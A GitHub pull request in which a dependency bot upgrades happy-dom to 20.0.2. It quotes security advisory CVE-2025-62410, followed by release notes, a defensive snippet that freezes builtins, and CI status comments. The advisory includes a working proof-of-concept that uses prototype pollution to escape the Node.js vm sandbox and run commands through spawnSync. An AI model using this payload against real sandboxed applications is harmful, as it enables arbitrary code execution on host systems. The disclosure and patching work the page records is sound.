Conversation

@renovate
Contributor

@renovate renovate bot commented Oct 11, 2025

This PR contains the following updates:

Package | Change | Age | Confidence
happy-dom | 20.0.0 → 20.0.2 | age | confidence

GitHub Vulnerability Alerts

CVE-2025-62410

Summary

The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.

Details

The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (universal) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).

PoC

Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().

import { Browser } from "happy-dom";

const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});

page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
    function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} 
    this.constructor.constructor.__proto__.__proto__.toString = f;
    this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
    // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
    
</script>
<body>Hello world!</body></html>`;

await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));

Impact

Arbitrary code execution via breaking out of the Node.js' vm isolation.

Recommended Immediate Actions

Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kinds of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to isolated-vm is suggested instead.

Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.


Release Notes

capricorn86/happy-dom (happy-dom)

v20.0.2

Compare Source

👷‍♂️ Patch fixes

v20.0.1

Compare Source

👷‍♂️ Patch fixes
  • Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled. By @capricorn86 in task #1932
    • A security advisory has been reported showing that the recommended preventive measure of running Node.js with --disallow-code-generation-from-strings wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to @cristianstaicu for reporting this!
    • The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the Wiki

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
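The advisory quoted above recommends freezing the builtins in the global scope, and v20.0.1 adds a warning when intrinsics are left unfrozen. The following is an added example, not code from happy-dom or from the advisory: it reports which common intrinsics are still mutable, freezes them, and self-checks that the Object.prototype override shown in the PoC no longer takes effect. The INTRINSICS list and the function names are this example's own choices, and it assumes the hardening runs before any untrusted script is evaluated.

```javascript
"use strict";
// Added example (not happy-dom's or the advisory's code). Assumes it runs
// before untrusted content is evaluated; INTRINSICS and the function names
// are this example's own choices.

// Intrinsics whose prototypes are reachable from any script in the same
// isolate (the PoC reaches Object.prototype via the Function constructor).
const INTRINSICS = [Object, Function, Array, String, Number, Boolean];

// Names of intrinsics whose constructor or prototype is still mutable.
function findUnfrozenIntrinsics(intrinsics = INTRINSICS) {
  return intrinsics
    .filter((c) => !Object.isFrozen(c) || !Object.isFrozen(c.prototype))
    .map((c) => c.name);
}

// Freeze each constructor and its prototype (shallow: objects reachable from
// them are not descended into). Returns true when every listed intrinsic is
// frozen afterwards.
function hardenIntrinsics(intrinsics = INTRINSICS) {
  for (const c of intrinsics) {
    Object.freeze(c.prototype);
    Object.freeze(c);
  }
  return findUnfrozenIntrinsics(intrinsics).length === 0;
}

// Self-check of the mitigation: attempt the same kind of write the PoC makes
// (overwriting Object.prototype.hasOwnProperty) and report whether it stuck.
// On a frozen prototype the write throws in strict mode and is ignored in
// sloppy mode; either way the builtin is left unchanged. If the write did
// land (unfrozen environment), the original is restored before returning.
function builtinOverrideLands() {
  const original = Object.prototype.hasOwnProperty;
  const marker = function () { return "tampered"; };
  try {
    Object.prototype.hasOwnProperty = marker;
  } catch (e) {
    // TypeError: Cannot assign to read only property (frozen target)
  }
  const changed = Object.prototype.hasOwnProperty === marker;
  if (changed) Object.prototype.hasOwnProperty = original;
  return changed;
}

// Usage: inspect, harden, then verify the override no longer lands.
const before = findUnfrozenIntrinsics();
console.log("unfrozen before hardening:", before);
console.log("all frozen after hardening:", hardenIntrinsics());
console.log("override still lands:", builtinOverrideLands()); // false
```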

@netlify

netlify bot commented Oct 11, 2025

Deploy Preview for yunielacosta failed.

Name Link
🔨 Latest commit b73d0bb
🔍 Latest deploy log https://app.netlify.com/projects/yunielacosta/deploys/68e9b66e41177500087b1134

@github-actions
Contributor

🤖 Hi @renovate[bot], I've received your request, and I'm working on it now! You can track my progress in the logs for more details.

@github-actions github-actions bot requested a review from yacosta738 October 11, 2025 01:44
@coderabbitai
Contributor

coderabbitai bot commented Oct 11, 2025

Important

Review skipped

Bot user detected.

To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.


Comment @coderabbitai help to get the list of available commands and usage tips.

@cloudflare-workers-and-pages

Deploying yacosta738-v3 with Cloudflare Pages

Latest commit: b73d0bb
Status: 🚫 Build failed.

View logs

@renovate renovate bot changed the title chore(deps): update dependency happy-dom to v20 [security] chore(deps): update dependency happy-dom to v20 [security] - autoclosed Oct 11, 2025
@renovate renovate bot closed this Oct 11, 2025
@renovate renovate bot deleted the renovate/npm-happy-dom-vulnerability branch October 11, 2025 08:36
@renovate renovate bot changed the title chore(deps): update dependency happy-dom to v20 [security] - autoclosed chore(deps): update dependency happy-dom to v20.0.2 [security] Oct 15, 2025
@renovate renovate bot reopened this Oct 15, 2025
@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch 2 times, most recently from b73d0bb to 2f9603a Compare October 15, 2025 20:59
@cloudflare-workers-and-pages

cloudflare-workers-and-pages bot commented Oct 15, 2025

Deploying yap-portfolio with Cloudflare Pages

Latest commit: 0c23b4d
Status: 🚫 Build failed.

View logs

@cloudflare-workers-and-pages

cloudflare-workers-and-pages bot commented Oct 15, 2025

Deploying with Cloudflare Workers

The latest updates on your project. Learn more about integrating Git with Workers.

Status | Name | Latest Commit | Updated (UTC)
✅ Deployment successful! (View logs) | yap-api | 0c23b4d | Dec 31 2025, 02:11 PM

@github-actions
Contributor

🎭 Playwright Test Results

Total Tests: N/A
Passed: N/A ✅
Failed: N/A ❌
Flaky: N/A ⚠️
Duration: 544s

View full report in artifacts

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 2f9603a to b4dbdd1 Compare October 15, 2025 22:13
@github-actions
Contributor

🎭 Playwright Test Results

Total Tests: N/A
Passed: N/A ✅
Failed: N/A ❌
Flaky: N/A ⚠️
Duration: 539s

View full report in artifacts

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch 6 times, most recently from c60d455 to e8f9391 Compare October 17, 2025 12:40
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: ccd8c9f
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch 2 times, most recently from 334a8a3 to ee3ac1d Compare October 17, 2025 14:10
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ❌ cancelled
📊 Code Quality ✅ success

Commit: 7fc24a6
Workflow: View Details

@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ❌ failure
🧪 Unit Tests ✅ success
🏗️ Build ⏭️ skipped
🎭 E2E Tests ⏭️ skipped
📊 Code Quality ✅ success

Commit: 9ccf796
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from ee3ac1d to 9402533 Compare October 17, 2025 19:07
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: 7a56b47
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 9402533 to 8257194 Compare October 19, 2025 09:29
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: e3354cc
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch 2 times, most recently from 30f6648 to 1aebf0f Compare October 19, 2025 12:56
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ❌ cancelled
🎭 E2E Tests ❌ cancelled
📊 Code Quality ✅ success

Commit: 81806c6
Workflow: View Details

@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: ed88e00
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 1aebf0f to b1e4d57 Compare October 20, 2025 15:34
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: 4a36a05
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from b1e4d57 to cedaf14 Compare October 21, 2025 17:49
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: 0e06e10
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from cedaf14 to 961562b Compare October 29, 2025 11:02
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: 9bf6c81
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 961562b to 9299752 Compare October 29, 2025 12:47
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: a0b8e30
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 9299752 to 392ec10 Compare November 10, 2025 20:02
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ✅ success
🏗️ Build ✅ success
🎭 E2E Tests ✅ success
📊 Code Quality ✅ success

Commit: 12108af
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 392ec10 to 66f0e9f Compare November 14, 2025 19:14
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ❌ failure
🏗️ Build ❌ failure
🎭 E2E Tests ⏭️ skipped
📊 Code Quality ✅ success

Commit: eead8dc
Workflow: View Details

@renovate renovate bot force-pushed the renovate/npm-happy-dom-vulnerability branch from 66f0e9f to 0c23b4d Compare December 31, 2025 14:10
@github-actions
Contributor

🤖 CI Pipeline Results

Check Status
🔍 Lint & Type Check ✅ success
🧪 Unit Tests ❌ failure
🏗️ Build ❌ failure
🎭 E2E Tests ⏭️ skipped
📊 Code Quality ✅ success

Commit: ef051c3
Workflow: View Details
